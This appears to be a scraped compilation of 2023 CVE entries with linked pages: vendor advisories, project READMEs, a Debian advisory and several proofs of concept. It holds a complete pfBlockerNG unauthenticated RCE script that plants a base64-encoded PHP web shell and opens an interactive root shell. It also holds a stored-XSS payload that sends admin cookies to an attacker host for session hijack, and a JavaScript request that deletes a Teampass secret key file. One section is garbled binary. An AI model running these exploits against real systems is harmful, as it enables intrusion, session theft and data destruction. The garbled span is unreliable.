The pump controller's ELF binary Mirage_CreateSessionCode.x contains a weak session token generation algorithm that can be predicted and can aid in authentication and authorization bypass attacks. Further, session hijacking is possible due to MitM attack exploiting clear-text transmission of sensitive data including session token in URL. Session ID predictability and randomness analysis of the variable areas of the Session ID was conducted and discovered a predictable pattern. The low entropy is generated by using four IVs comprised of username, password, ip address and hostname.

Title: Osprey Pump Controller 1.0.1 Predictable Session Token / Session Hijack  
Advisory ID: ZSL-2023-5745  
Type: Local/Remote  
Impact: Security Bypass  
Risk: (3/5)  
Release Date: 27.02.2023

**Summary**

Providing pumping systems and automated controls for golf courses and turf irrigation, municipal water and sewer, biogas, agricultural, and industrial markets. Osprey: door-mounted, irrigation and landscape pump controller.

Technology hasn't changed dramatically on pump and electric motors in the last 30 years. Pump station controls are a different story. More than ever before, customers expect the smooth and efficient operation of VFD control. Communications—monitoring, remote control, and interfacing with irrigation computer programs—have become common requirements. Fast and reliable accessibility through cell phones has been a game changer.

ProPump & Controls can handle any of your retrofit needs, from upgrading an older relay logic system to a powerful modern PLC controller, to converting your fixed speed or first generation VFD control system to the latest control platform with communications capabilities.

We use a variety of solutions, from MCI-Flowtronex and Watertronics package panels to sophisticated SCADA systems capable of controlling and monitoring networks of hundreds of pump stations, valves, tanks, deep wells, or remote flow meters.

User friendly system navigation allows quick and easy access to all critical pump station information with no password protection unless requested by the customer. Easy to understand control terminology allows any qualified pump technician the ability to make basic changes without support. Similar control and navigation platform compared to one of the most recognized golf pump station control systems for the last twenty years make it familiar to established golf service groups nationwide. Reliable push button navigation and LCD information screen allows the use of all existing control panel door switches to eliminate the common problems associated with touchscreens.

Global system configuration possibilities allow it to be adapted to virtually any PLC or relay logic controlled pump stations being used in the industrial, municipal, agricultural and golf markets that operate variable or fixed speed. On board Wi-Fi and available cellular modem option allows complete remote access.

**Description**

The pump controller's ELF binary Mirage\_CreateSessionCode.x contains a weak session token generation algorithm that can be predicted and can aid in authentication and authorization bypass attacks. Further, session hijacking is possible due to MitM attack exploiting clear-text transmission of sensitive data including session token in URL. Session ID predictability and randomness analysis of the variable areas of the Session ID was conducted and discovered a predictable pattern. The low entropy is generated by using four IVs comprised of username, password, ip address and hostname.

**Vendor**

ProPump and Controls, Inc. - https://www.propumpservice.com | https://www.pumpstationparts.com

**Affected Version**

Software Build ID 20211018, Production 10/18/2021  
Mirage App: MirageAppManager, Release \[1.0.1\]  
Mirage Model 1, RetroBoard II

**Tested On**

Apache/2.4.25 (Raspbian)  
Raspbian GNU/Linux 9 (stretch)  
GNU/Linux 4.14.79-v7+ (armv7l)  
Python 2.7.13 \[GCC 6.3.0 20170516\]  
GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git  
PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33)

**Vendor Status**

\[05.01.2023\] Vulnerabilities discovered.  
\[07.01.2023\] Vendor contacted.  
\[09.01.2023\] No response from the vendor.  
\[10.01.2023\] Vendor contacted.  
\[10.01.2023\] CISA contacted through CVD.  
\[10.01.2023\] Submitted to VINCE.  
\[12.01.2023\] CISA/VINCE asked for more details.  
\[13.01.2023\] Provided PoCs to CISA.  
\[13.01.2023\] Provided PoCs to VINCE and discovered XSS in VINCE.  
\[26.01.2023\] No response from VINCE.  
\[26.01.2023\] CISA closes incident: INC000010422052. NCISS Score: Baseline - Negligible (White). A Baseline–Negligible priority incident is an incident that is highly unlikely to affect public health or safety, national security, economic security, foreign relations, civil liberties, or public confidence. No further actions required by CISA.  
\[26.02.2023\] No response from the vendor.  
\[27.02.2023\] Public security advisory released.

**PoC**

osprey\_session.txt

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

\[1\] https://www.cisa.gov/news-events/news/cisa-national-cyber-incident-scoring-system-nciss

**Changelog**

\[27.02.2023\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

Osprey Pump Controller 1.0.1 Predictable Session Token / Session Hijack

Domotica Labs srl Ikon Server before v2.8.6 was discovered to contain a SQL injection vulnerability.

L’**Offensive Security Team di Swascan** ha identificato una vulnerabilità di tipo SQL Injection (unauthenticated) con una severity pari a 7.5 (High) sul prodotto dell’azienda **Domotica Labs, IKON SERVER** **ver. 2.8.6**

**Domotica Labs**

Domotica Labs è un’azienda italiana specializzata nello sviluppo di soluzioni di supervisione e controllo, apparati IOT e applicazioni cloud per la gestione di edifici ed impianti intelligenti.

Sempre parte del portfolio aziendale è la produzione di dispositivi embedded, firmware, app e soluzioni cloud in ambito internet of things e industria 4.0.

Azienda molto attenta e sensibile alle problematiche di sicurezza e la ringraziamo per la collaborazione durante la fase di responsible disclosure.

**Descrizione del prodotto vulnerabile**

IKON SERVER è un web server di supervisione in grado di interagire con numerose tecnologie sia standard sia proprietarie, per offrire un unico ambiente di gestione per domotica, impianti tecnologici e termotecnici, sicurezza e multimedialità.

**Technical summary**

L’Offensive Security Team di Swascan ha rilevato alcune importanti vulnerabilità su: iKON SERVER ver. 2.8.6

**Vulnerability** 

**CVSSv3.1** 

**CVSSv3.1 Base Score**

SQL Injection (unauthenticated) 

7.5 High 

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 

Una SQL injection è un tipo di attacco informatico in cui un attaccante inserisce codice SQL maligno in una query, al fine di manipolare il database per acquisire informazioni riservate o per causare danni.Questo tipo di attacco sfrutta vulnerabilità nell’architettura delle applicazioni web che utilizzano query SQL per interagire con i database.

Terminato l’iter di responsible vulnerability disclosure, in pieno accordo con Domotica Labs, Swascan ha scelto di non divulgare i dettagli tecnici della vulnerabilità.

**Considerazioni finali**

Swascan ringrazia Domotica Labs per la loro collaborazione nella gestione del disclosure, per il loro impegno nel garantire la massima resilienza di prodotti e soluzioni e per grande professionalità dimostrata durante tutte le fasi del processo.

**Remediation**

Si consiglia di aggiornare all’ultima versione disponibile.

**Riferimenti**

https://www.owasp.org/index.php/SQL\_Injection

https://cwe.mitre.org/data/definitions/89.html

https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/SQL\_Injection\_Prevention\_Cheat\_Sheet.md

https://owasp.org/Top10/A03\_2021-Injection/

https://www.domoticalabs.com/article/come-aggiornare-ikon-server

**Disclosure Timeline**

*   13-04-2022: Vulnerabilities discovered
*   19-04-2022: Vendor contacted by email (1st time, responded 21/04/2022)
*   11-05-2022: Vendor patched
*   16-01-2023: Swascan disclosed

CVE-2023-24253: Security Advisory: Domotica Labs - IKON SERVER

An arbitrary file upload vulnerability in laravel-admin v1.8.19 allows attackers to execute arbitrary code via a crafted PHP file.

⛵laravel-admin is administrative interface builder for laravel which can help you build CRUD backends just with few lines of code.

Documentation | 中文文档 | Demo | Demo source code | Extensions

      

Inspired by SleepingOwlAdmin and rapyd-laravel.

**Sponsor****Requirements**

*   PHP >= 7.0.0
*   Laravel >= 5.5.0
*   Fileinfo PHP Extension

**Installation**

> This package requires PHP 7+ and Laravel 5.5, for old versions please refer to 1.4

First, install laravel 5.5, and make sure that the database connection settings are correct.

    composer require encore/laravel-admin
    

Then run these commands to publish assets and config：

    php artisan vendor:publish --provider="Encore\Admin\AdminServiceProvider"
    

After run command you can find config file in config/admin.php, in this file you can change the install directory,db connection or table names.

At last run following command to finish install.

    php artisan admin:install
    

Open http://localhost/admin/ in browser,use username admin and password admin to login.

**Configurations**

The file config/admin.php contains an array of configurations, you can find the default configurations in there.

**Right to left support**

just go to this path <YOUR_PROJECT_PATH>\vendor\encore\laravel-admin\src\Traits\HasAssets.php and modify $baseCss array for loading right to left (rtl) version of bootstap and AdminLTE css files.  
**bootstrap.min.css** change it to **bootstrap.rtl.min.css**  
**AdminLTE.min.css** change it to **AdminLTE.rtl.min.css**

**Extensions**

Extension

Description

laravel-admin

helpers

Several tools to help you in development

~1.5

media-manager

Provides a web interface to manage local files

~1.5

api-tester

Help you to test the local laravel APIs

~1.5

scheduling

Scheduling task manager for laravel-admin

~1.5

redis-manager

Redis manager for laravel-admin

~1.5

backup

An admin interface for managing backups

~1.5

log-viewer

Log viewer for laravel

~1.5

config

Config manager for laravel-admin

~1.5

reporter

Provides a developer-friendly web interface to view the exception

~1.5

wangEditor

A rich text editor based on wangeditor

~1.6

summernote

A rich text editor based on summernote

~1.6

china-distpicker

一个基于distpicker的中国省市区选择器

~1.6

simplemde

A markdown editor based on simplemde

~1.6

phpinfo

Integrate the phpinfo page into laravel-admin

~1.6

php-editor  
python-editor  
js-editor  
css-editor  
clike-editor

Several programing language editor extensions based on code-mirror

~1.6

star-rating

Star Rating extension for laravel-admin

~1.6

json-editor

JSON Editor for Laravel-admin

~1.6

grid-lightbox

Turn your grid into a lightbox & gallery

~1.6

daterangepicker

Integrates daterangepicker into laravel-admin

~1.6

material-ui

Material-UI extension for laravel-admin

~1.6

sparkline

Integrates jQuery sparkline into laravel-admin

~1.6

chartjs

Use Chartjs in laravel-admin

~1.6

echarts

Use Echarts in laravel-admin

~1.6

simditor

Integrates simditor full-rich editor into laravel-admin

~1.6

cropper

A simple jQuery image cropping plugin.

~1.6

composer-viewer

A web interface of composer packages in laravel.

~1.6

data-table

Advanced table widget for laravel-admin

~1.6

watermark

Text watermark for laravel-admin

~1.6

google-authenticator

Google authenticator

~1.6

**Contributors**

This project exists thanks to all the people who contribute. \[Contribute\]. 

**Backers**

Thank you to all our backers! 🙏 \[Become a backer\] 

**Sponsors**

Support this project by becoming a sponsor. Your logo will show up here with a link to your website. \[Become a sponsor\]          

**Other**

laravel-admin based on following plugins or services:

*   Laravel
*   AdminLTE
*   Datetimepicker
*   font-awesome
*   moment
*   Google map
*   Tencent map
*   bootstrap-fileinput
*   jquery-pjax
*   Nestable
*   toastr
*   X-editable
*   bootstrap-number-input
*   fontawesome-iconpicker
*   sweetalert2

**License**

laravel-admin is licensed under The MIT License (MIT).

CVE-2023-24249: GitHub - z-song/laravel-admin: Build a full-featured administrative interface in ten minutes

External Control of File Name or Path in GitHub repository nilsteampassnet/teampass prior to 3.0.0.22.

**Description**

The file sources/export.queries.php can be exploited by any authenticated user to remove arbitrary txt files. If the system administrator configured the base path for the teampass-seckey.txt to be /var/teampass, as shown in the official example, it is possible to remove it causing a total disruption of the application (all the pages will return 500 Internal Server Error).

When the attack is executed the original .txt file is deleted and a new file named as the deleted one but without the extension is created. The new file will contain some HTML and the content of the original file encrypted by a password chosen by the attacker, making the recovering of the original file impossible.

**Proof of Concept**

The following PoC assumes that the Teampass SaltKey is stored to /var/teampass/teampass-seckey.txt.

Login with any user (no special permission is required), open a browser console and execute the following JavaScript:

    fetch('http://localhost/teampass/sources/export.queries.php', {
        method: 'POST',
        credentials: 'include',
        body: new URLSearchParams({
            type: 'export_to_html_format_finalize',
            file: '/var/teampass/teampass-seckey',
            pdf_password: 'GoodbyeSecretKey'
        }),
        headers: {
            'Content-Type': 'application/x-www-form-urlencoded'
        }
    })
    
    

**Impact**

This vulnerability can be used by an attacker with low privileges to remove arbitrary txt files. It can lead to a total loss of availability if the path of the teampass-seckey.txt is known.

CVE-2023-1070: Arbitrary txt files deletion (authenticated) in teampass

Art Gallery Management System Project in PHP 1.0 was discovered to contain a SQL injection vulnerability via the pid parameter in the single-product page.

����i�8v���������NҦMvQ ��g�ό�c⋪�NO4՚I�҆(3=qzB��j�h%�ab=}l'�Hy�����Q��R�Ԟ!�ĉ�0�Fq\*�g����w|��u� �&��������� �dTM'\\��"<�r-k���ZY��|ʴ�Q߿\[^~��:)��|:?�(uzr֘�Y��gYS�����qN��\[Ʊ\[�\_j���r��p�r����(��� &�V�Sx����dgx��N��:U���n��TQ��� �H���z�{���z7<�~���� ���)s���� ѐP\*���͐�8j�����e9��}z)Kj L�Pa\`��X�:\\�qz�\\,�0~��ݫ�?߿��b�/p"����$Yx\]��3���@��)n�!�����('�vjV���@5�����\_x��B8�c��l�v˭6��#/�(?C�IJ�9M\*x�\\B.v�x˩�Q� �J&f84��-������S��;1C'v\*��P%Ý�\\ OԘ��Z:�aS �\[!�P�)1�{�v.����%��1�nqd\\>TTW� v}�|��V�<(���Gѕ� �Ҍ�Y\*����w���h3�B0cOe\`���\\�,��?=iqG$��oY2��,�J,�ٴ�"��aJ^��KE�>�5?�mwDb�a�\*о�+���,Š� �D�y�y�P�{�0l�M�\_I������c(\*2�\[�,� 90r��Fc�H�2\`��M:b����a��F�ebO��h�ǯ�j'�"�n����/�S�C��<틠P񬕱ſa���9���9ô ��0����a:<;���L0}�T�erh��#�Zo &�iʈ.ITfy��D���H\[BV�Lk\[QW�����N���ߢG��鏐�����=5?KU�5�,s�GW��\[xr�"��h����\\\*0{������9�G\*�\\5nݓ�����홱��H�@2�����Z4�/��5CM�ƛ15�r��U���6m�K;K��?��M�9����b�ԤŊ(E�Skӷ§'��v3�����F���mM��^LbM���+�8�w��.�µ�u��Ŝ$�\[��Ps.֌\]��Q6�N�I�K�SC�e�R3E�\`�0��-,Vw��@�=�-�1U� \`\]����w����f���!0�F1�FE�,M+lC�qҵ��8�X�{sx����D�!}���F~x� ��!xg�����i?�n��.p���������/�Z?F���@Nz�n�⫂| �2��>�����6fW�#���b%Qۖj��n�Ќܛ2�<ĸ��KlYb��U�f��F�-�����F;��=�\[����v}�1����dv�����=��tt�@������\_���֜}ONJ��0�.�ذ�����|�5nyu��ӫ#2����CN����y��/h��L����U��j藇)���><�+oCo�����l��������ta��PKAR�U�$@ز0Art-Gallery-MS-PHP/agms/admin/add-art-medium.php�Xmo�6� ��\*� LV\_>��t\]��C�.PE�-1�H���z\[����$\[�d��C�|����xL|\]��兦Z3)n�!�LgW�T)�n-�2Ld�Gv���W)�N���D A��s��8���(N������j�盿>LHVh�������l�^^䔤TM'\\&�R<�2��i���\_�k�x�

CVE-2023-23156

Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the name parameter on the registration page.

Permalink

Cannot retrieve contributors at this time

\> \[Suggested description\]

\> Simple Customer Relationship Management System v1.0 was discovered to

\> contain a cross-site scripting (XSS) vulnerability via the name parameter on the

\> registration page.

\>

\> ------------------------------------------

\>

\> \[Additional Information\]

\> Steps-To-Reproduce:

\> Step 1:\\tGo to the registration page http://localhost/php-scrm/registration.php

\> Step 2:\\tNow fill out the registration form and put the payload in the name field.

\> \\t\\t\\tPayload: <img src=x onerror=this.src=\`http://192.168.1.208:1234/?c=\`+document.cookie>

\> Step 3:\\tNow click on the Create Account button.

\> Step 4:\\tNow Start the python web server on attacker system.

\> \\t\\t\\t# python -m http.server 1234

\> Step 5:\\tNow when the admin loged in to the admin panel and navigate to the Users tab to manage users (http://localhost/php-scrm/admin/manage-users.php) from the dashboard the XSS payload is executed and the attacke gets the admin cookie on attackers web server.

\> Step 6:\\tNow navigate to the admin login page http://127.0.0.1/php-scrm/login.php in new private window.

\> Step 7:\\tNow copy the cookie which we get on python web server when the xss payload is executed.

\> Step 8:\\tNow change the PHPSESSID value with the copied cookie like "vupi1sfffgpla0tt0hijfpeneq" and save it by the cookie editor.

\> Step 9:\\tNow navigate to the admin dashboard by following URL: http://localhost/php-scrm/admin/home.php

\> Step 10:\\tThe admin user session successfully Hijeck.

\>

\> ------------------------------------------

\>

\> \[Vulnerability Type\]

\> Cross Site Scripting (XSS)

\>

\> ------------------------------------------

\>

\> \[Vendor of Product\]

\> https://www.sourcecodester.com

\>

\> ------------------------------------------

\>

\> \[Affected Product Code Base\]

\> Simple Customer Relationship Management (CRM) System - 1.0

\>

\> ------------------------------------------

\>

\> \[Affected Component\]

\> http://localhost/php-scrm/registration.php

\>

\> ------------------------------------------

\>

\> \[Attack Type\]

\> Remote

\>

\> ------------------------------------------

\>

\> \[Impact Code execution\]

\> true

\>

\> ------------------------------------------

\>

\> \[Impact Escalation of Privileges\]

\> true

\>

\> ------------------------------------------

\>

\> \[Impact Information Disclosure\]

\> true

\>

\> ------------------------------------------

\>

\> \[Attack Vectors\]

\> Cross-Site Scripting (XSS) is a type of cyber attack that allows an attacker to inject malicious code into a website. When a victim visits the compromised website, the injected code is executed by the victim's web browser, allowing the attacker to steal sensitive information such as login credentials, steal cookies, or perform other malicious actions.

\>

\> Stored XSS is a type of XSS that involves injecting malicious code into a website's persistent storage, such as a database, which is then served to users when they access the website.

\>

\> Form-based Cross-Site Scripting (XSS) attacks can have serious consequences for both individuals and organizations. By injecting malicious code into a website through a form field, an attacker can potentially steal sensitive information, and an admin cookie, redirect victims to malicious websites, execute unauthorized actions on behalf of the victim, and even inject additional malicious code into the website to continue executing malicious actions.

\>

\> ------------------------------------------

\>

\> \[Reference\]

\> https://www.sourcecodester.com/php/15895/simple-customer-relationship-management-crm-system-using-php-free-source-coude.html

\> https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-scrm.zip

\>

\> ------------------------------------------

\>

\> \[Discoverer\]

\> Yogesh Verma

Use CVE-2023-24651.

CVE-2023-24651: CVE/CVE-2023-24651.txt at main · y0gesh-verma/CVE

Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the name parameter under the Request a Quote function.

Submitted by oretnom23 on Tuesday, November 29, 2022 - 15:00.

This project is entitled **Simple Customer Relationship Management (CRM) System**. It is a web-based application that was developed using **PHP** and **MySQL Database**. It provides certain business customers with an online platform where they can submit quotation requests and issue tickets. It has a pleasant user interface using the **Bootstrap Framework**. This project is consist of user-friendly features and functionalities.

****How does the Simple Customer Relationship Management (CRM) System work?****

This **Simple Customer Relationship Management (CRM) System** can be accessed by 2 different user roles which are the **Administrator** and the **Customers**. The **Administrator** can access the admin panel of the system while the **Customer** has access to the customer side of the application.

The **Administrator** user is the one who is in charge of managing the important data on the system. This side of the system requires the **Admin User** to log in with his/her valid system credentials in order to access and manage the system on the admin side. Here, the administrator is able to read and manage the **quotation requests of the customers** and the same as well on the **created or issued tickets** of the customers. Aside from that, the admin can also list the registered customers' accounts.

The **Customers** are required to signup and log in to the system in order to gain access to the different features and functionalities on the **Customer Side**. They submit **quotation requests** and **tickets**. The customer can only access and manage the list of quotation requests and tickets that he or she submitted.

****Features and Functionalities****

Here are the different features and functionalities of the **Simple Customer Relationship Management (CRM) System**

****Admin Site****

*   **Login and Logout**
*   **Dashboard**
    *   Data Summary
    *   Visitors Graph
*   **List and Manage Tickets**
*   **List and Manage Customers' Quotation Requests**
*   **List All Users' Access Logs**
*   **List and Manage Registered Users' Accounts**
*   **Update/Change Password**

****Customer Site****

*   **Login and Registration**
*   **Dashboard**
*   **Create Quotation Request**
*   **List Tickets**
*   **Create Ticket**
*   **View Ticket Details**
*   **View and Manage Profile**
*   **Update/Change Password**

****Technologies****

Here is the list of Technologies to develop the **Simple Customer Relationship Management (CRM) System**:

*   HTML
*   CSS
*   PHP
*   MySQL Database
*   Bootstrap Framework
*   DataTables
*   JavaScript
*   jQuery Library

The **Simple Customer Relationship Management (CRM) System Project** source code **zip file** is provided on this website and is free to download. Feel Free to download the source code and modify it to meet your own requirements.

****Snapshots********Admin Dashboard****

****Quote Request Details (Admin)****

****Ticket List (Admin)****

****Customer Dashboard****

****Quote Request Form (Customer-Side)****

****Ticket Form (Customer-Side)****

****How to Run?****

****Requirements****

*   **Download** and **Install** any **local web server** such as **XAMPP.**
*   **Download** the provided source code **zip** file. (_download button is located below_)

****System Installation/Setup****

1.  **Open** your **XAMPP Control Panel** and start ****Apache**** and ****MySQL****.
2.  **Extract** the **downloaded source code **zip** file**.
3.  **Copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**.
4.  **Browse** the ****PHPMyAdmin**** in a **browser**. i.e. ****http://localhost/phpmyadmin****
5.  **Create** a **new database** named ****scrm\_db****.
6.  **Import** the provided ****SQL**** file. The file is known as ****scrm\_db.sql**** located inside the **database** folder.
7.  **Browse** the **Simple Customer Relationship Management (CRM) System** in a **browser**. i.e. ****http://localhost/php-scrm/****.

****Admin Default Access:****

Username: **admin**  
Password: **admin123**

****DEMO VIDEO****

That's it! I hope this **Simple Customer Relationship Management (CRM) System Project in PHP and MySQL Database** helps you with what you are looking for and that you'll find something useful in the source code file itself.

Explore more on this website for more **Tutorials** and **Free Source Codes**.

****Enjoy :)****

*   5237 views

CVE-2023-24654: Simple Customer Relationship Management (CRM) System using PHP Free Source Code

Debian Linux Security Advisory 5363-1 - Multiple security issues were found in PHP, a widely-used open source general purpose scripting language which could result in denial of service or incorrect validation of BCrypt hashes.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5363-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffFebruary 24, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : php7.4CVE ID         : CVE-2023-0567 CVE-2023-0568 CVE-2023-0662 CVE-2022-31631Multiple security issues were found in PHP, a widely-used open sourcegeneral purpose scripting language which could result in denial ofservice or incorrect validation of BCrypt hashes.For the stable distribution (bullseye), these problems have been fixed inversion 7.4.33-1+deb11u3.We recommend that you upgrade your php7.4 packages.For the detailed security status of php7.4 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/php7.4Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmP5DdEACgkQEMKTtsN8TjY58w/9GRvhye3duJAG/UslWaVW+Qdmoxl7LELg+7RHm46B++9N/kntThNp9jb5k+Esa4BMc0I9EaUbXgKrIZSFqFxjV1I+yZbyQea/Ww55eLnh6K4huJlJ0wCwKU7S+Q1BTgvD1xDchvRBiKNuRC+tVNYJDGvsQmth7P7u96IUTKES49F79LEZo8Ec+flWq8wimUhvXk6Rq103CSPqXF3v9HXl1v9LWeg7ABraEnAwL6qYwpALDu0ivHa1xh7KxDyGZ3lloTW4D+ooaIQGC+81GS2MiHszK8k6S81QrmUxvoR72yWaQgB5sAOw4VtZX/yKSOloLvlG2ryRuqeBJOERZHYJvbfAAB0ozMVPVM/CKddfkFAa/qd8XBNoJ1RZRIbisupluO/iVrLCW/6WaKBxNmbXP4vUBFfWhm2YK6MuYR6mH1aiURpc+58j54ZxwWYY0JGn40V0kjVHzIP8m5V/eOxMt1JeCPhcWgLFrl8JfgjiCjpBlQy0w458htcDU6wDLof23HpB4oEVlJ1O4VIihnbrOM1iNhACBqssUWB+W9yJdr8/peQ1ItvsnBWLFy2Y6AKbDeKBkJQMfq+z4bJyPcW+UBV3RasPJaPzXDBKj9v9Pr7mkTicHAfpy0vYvN0c51Qq8O5omyFRf2mSdwdxg5RBGtgr8jl2LbUiIYsoyRpMlhM=KwJ/-----END PGP SIGNATURE-----

Debian Security Advisory 5363-1

pfBlockerNG version 2.1.4_26 remote code execution exploit.

    # Exploit Title: pfBlockerNG 2.1.4_26 - Remote Code Execution (RCE)# Shodan Results: https://www.shodan.io/search?query=http.title%3A%22pfSense+-+Login%22+%22Server%3A+nginx%22+%22Set-Cookie%3A+PHPSESSID%3D%22# Date: 5th of September 2022# Exploit Author: IHTeam# Vendor Homepage: https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html# Software Link: https://github.com/pfsense/FreeBSD-ports/pull/1169# Version: 2.1.4_26# Tested on: pfSense 2.6.0# CVE : CVE-2022-31814# Original Advisory: https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/ #!/usr/bin/env python3import argparseimport requestsimport timeimport sysimport urllib.parsefrom requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) parser = argparse.ArgumentParser(description="pfBlockerNG <= 2.1.4_26 Unauth RCE")parser.add_argument('--url', action='store', dest='url', required=True, help="Full URL and port e.g.: https://192.168.1.111:443/")args = parser.parse_args() url = args.urlshell_filename = "system_advanced_control.php" def check_endpoint(url):  response = requests.get('%s/pfblockerng/www/index.php' % (url), verify=False)  if response.status_code == 200:    print("[+] pfBlockerNG is installed")  else:    print("\n[-] pfBlockerNG not installed")    sys.exit() def upload_shell(url, shell_filename):  payload = {"Host":"' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+'|python3.8 -m base64 -d | php; '"}  print("[/] Uploading shell...")  response = requests.get('%s/pfblockerng/www/index.php' % (url), headers=payload, verify=False)  time.sleep(2)  response = requests.get('%s/system_advanced_control.php?c=id' % (url), verify=False)  if ('uid=0(root) gid=0(wheel)' in str(response.content, 'utf-8')):    print("[+] Upload succeeded")  else:    print("\n[-] Error uploading shell. Probably patched ", response.content)    sys.exit() def interactive_shell(url, shell_filename, cmd):  response = requests.get('%s/system_advanced_control.php?c=%s' % (url, urllib.parse.quote(cmd, safe='')), verify=False)  print(str(response.text)+"\n")  def delete_shell(url, shell_filename):  delcmd = "rm /usr/local/www/system_advanced_control.php"  response = requests.get('%s/system_advanced_control.php?c=%s' % (url, urllib.parse.quote(delcmd, safe='')), verify=False)  print("\n[+] Shell deleted") check_endpoint(url)upload_shell(url, shell_filename)try:  while True:    cmd = input("# ")    interactive_shell(url, shell_filename, cmd)except:  delete_shell(url, shell_filename)

pfBlockerNG 2.1.4_26 Remote Code Execution

A vulnerability classified as critical has been found in SourceCodester Doctors Appointment System 1.0. This affects an unknown part of the file create-account.php. The manipulation of the argument newemail leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-221823.

Permalink

main

Switch branches/tags

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

Go to file

*   Go to file

*   Copy path
*   Copy permalink

Cannot retrieve contributors at this time

107 KB

Download

*   Open with Desktop
*   Download
*   Delete file

Sorry, something went wrong. Reload?

Sorry, we cannot display this file.

Sorry, this file is invalid so it cannot be displayed.

Tag

#php